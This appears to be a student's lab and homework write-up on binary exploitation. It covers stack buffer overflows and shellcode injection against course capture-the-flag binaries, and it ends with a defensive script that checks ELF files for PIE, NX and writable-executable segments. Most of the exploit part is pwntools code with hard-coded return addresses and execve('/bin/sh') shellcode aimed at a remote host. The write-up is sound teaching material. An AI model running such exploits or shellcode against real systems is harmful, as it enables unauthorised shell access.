# Week11 & 12 11/26 & 12/3

## `Lab 1`

### Buffer Overflow

![](https://i.imgur.com/c5ijF8t.png)

> * ![](https://i.imgur.com/0qErq9C.png)
> * First, check what kind of file it is: it is 64-bit.
> * The program says bof, so it should be a buffer overflow problem.
> * After the bof the instruction pointer is affected, which causes the error.
> * So I tried feeding repeated 'A's to find at what length the program's input overflows.
> * ![](https://i.imgur.com/818lJ38.png)
> * ![](https://i.imgur.com/w2HS4st.png)
> * Found 24, and also appended BBB to confirm that the IP contains 424242 (the bof).
> * Now we offset by 24 positions and point the instruction pointer at the address we want.
> * What we look for is the shell address; after running the Python script we get into the shell, see that there is a flag file, and `cat flag` gets the flag.
> * ![](https://i.imgur.com/DTZGrch.png)
> * ![](https://i.imgur.com/o3FQNU9.png)
> * ![](https://i.imgur.com/HezXRdi.png)
>
> ```python
> from pwn import *
>
> # r = process('./lab1')          # local run
> r = remote('140.134.25.138', 20001)
> r.recvline()
> input()                          # pause here to attach a debugger if needed
> # r.recvuntil('Your first challenge for bof')
> # 24 bytes of padding reach the saved return address, then the shell address
> r.send(b'a' * 24 + p64(0x400638))
> r.sendline(b'cat flag')          # bytes with a newline, so the shell runs it
> # print(p64(0x400638))
> r.interactive()
> ```
>
> * Reference video: https://www.youtube.com/watch?v=YVlTDPhTA9U&ab_channel=JohnHammond

## `Lab 2`

### Shellcode

![](https://i.imgur.com/cEmFklP.png)

> ```python
> from pwn import *
>
> # r = process('./lab2')          # local run
> r = remote('140.134.25.138', 20002)
> context.arch = 'amd64'
> # code = shellcraft.sh()         # pwntools' generated /bin/sh shellcode, not used here
> # asm_code = asm(code)
> code = '''
> mov rbx, 0x68732f6e69622f   ; "/bin/sh\\0" as a little-endian qword
> push rbx
> mov rdi, rsp                ; rdi = pointer to "/bin/sh"
> mov rsi, 0x0                ; argv = NULL
> mov rdx, 0x0                ; envp = NULL
> mov rax, 0x3b               ; execve syscall number on x86-64
> syscall
> '''
> print(code)
> asm_code = asm(code)
> print(len(asm_code))
> r.send(asm_code)                 # shellcode is stored at 0x601060 by the program
> r.sendline(b'a' * 24 + p64(0x601060))   # overwrite the return address with it
> r.interactive()
> ```
>
> * ![](https://i.imgur.com/6djen0m.png)

## `HW1`

![](https://i.imgur.com/D3r1iUe.png)

> ```python
> from pwn import *
>
> r = remote('140.134.25.138', 25000)
> # r.recvline()
> # 40 bytes of padding, then the target address
> r.send(b'a' * 40 + p64(0x400778))
> # second input: 28 bytes of padding followed by a zero qword
> r.send(b'a' * 28 + p64(0))
> r.interactive()
> ```
>
> ![](https://i.imgur.com/Bc4foVr.png)

## `HW2`

> ![](https://i.imgur.com/HktDrMY.png)

## `HW3`

```python
from pwn import *

# r = process('./hw3')            # local run
r = remote('140.134.25.138', 25002)
input()                           # pause here to attach a debugger if needed
context.arch = 'amd64'
code = shellcraft.sh()            # pwntools' /bin/sh shellcode
asm_code = asm(code)
# 28 + 4 + 8 = 40 bytes of padding before the return address; the 4-byte
# value 0x40 is packed with p32 (assumed: the note's original text was garbled here)
r.send(b'a' * 28 + p32(0x40) + b'a' * 8 + p64(0x6010a0))
r.send(asm_code)                  # shellcode lands at 0x6010a0
r.interactive()
```
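Every exploit in these labs hard-codes an address (0x400638, 0x601060, 0x6010a0) and, in Lab 2 and HW3, runs shellcode out of a writable data segment, so they only work when the binary is built without PIE and with that memory executable. The following standard-library script (an added example, not part of the lab or of pwntools) reads the ELF64 program headers to report exactly those two properties and the permissions of the segment that maps a given address; `build_sample` constructs a header-only test image, since no lab binary is included here.

```python
import struct

ET_DYN = 3
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
PHDR = "<IIQQQQQQ"   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align

def _phdrs(data):
    if data[:4] != b"\x7fELF" or data[4] != 2:           # EI_CLASS 2 == ELF64
        raise ValueError("not an ELF64 image")
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    for i in range(e_phnum):
        p_type, p_flags, _, vaddr, _, _, memsz, _ = struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize)
        yield p_type, p_flags, vaddr, memsz

def mitigations(data):
    """PIE and NX status, plus the number of PT_LOAD segments that are both writable and executable."""
    e_type = struct.unpack_from("<H", data, 16)[0]
    nx, wx = False, 0      # no PT_GNU_STACK at all: Linux falls back to an executable stack
    for p_type, p_flags, _, _ in _phdrs(data):
        if p_type == PT_GNU_STACK:
            nx = not p_flags & PF_X
        elif p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            wx += 1
    return {"pie": e_type == ET_DYN, "nx": nx, "wx_load_segments": wx}

def segment_perms(data, addr):
    """'rwx'-style permissions of the PT_LOAD segment mapping addr, or None if it is not mapped."""
    for p_type, p_flags, vaddr, memsz in _phdrs(data):
        if p_type == PT_LOAD and vaddr <= addr < vaddr + memsz:
            return "".join(c if p_flags & f else "-" for c, f in (("r", PF_R), ("w", PF_W), ("x", PF_X)))
    return None

def build_sample(pie=False, exec_stack=True, exec_data=True):
    """Constructed ELF64 image (header + 3 program headers, no code) used only as test input."""
    ehdr = bytearray(64)
    ehdr[:6] = b"\x7fELF\x02\x01"                          # ELF64, little-endian
    struct.pack_into("<HHIQQQIHHHHHH", ehdr, 16, ET_DYN if pie else 2, 62, 1,
                     0x400000, 64, 0, 0, 64, 56, 3, 64, 0, 0)   # e_type .. e_shstrndx
    text = struct.pack(PHDR, PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)
    data = struct.pack(PHDR, PT_LOAD, PF_R | PF_W | (PF_X if exec_data else 0),
                       0x1000, 0x601000, 0x601000, 0x100, 0x1000, 0x1000)   # .data/.bss region
    stack = struct.pack(PHDR, PT_GNU_STACK, PF_R | PF_W | (PF_X if exec_stack else 0), 0, 0, 0, 0, 0, 16)
    return bytes(ehdr) + text + data + stack

if __name__ == "__main__":
    img = build_sample()
    print(mitigations(img), segment_perms(img, 0x601060), segment_perms(img, 0x400638))
```

To audit a real file, replace the sample with `open(path, "rb").read()`; a result of `pie=True`, `nx=True` and `"rw-"` for the data address is what removes the hard-coded-address and data-segment-shellcode techniques used above.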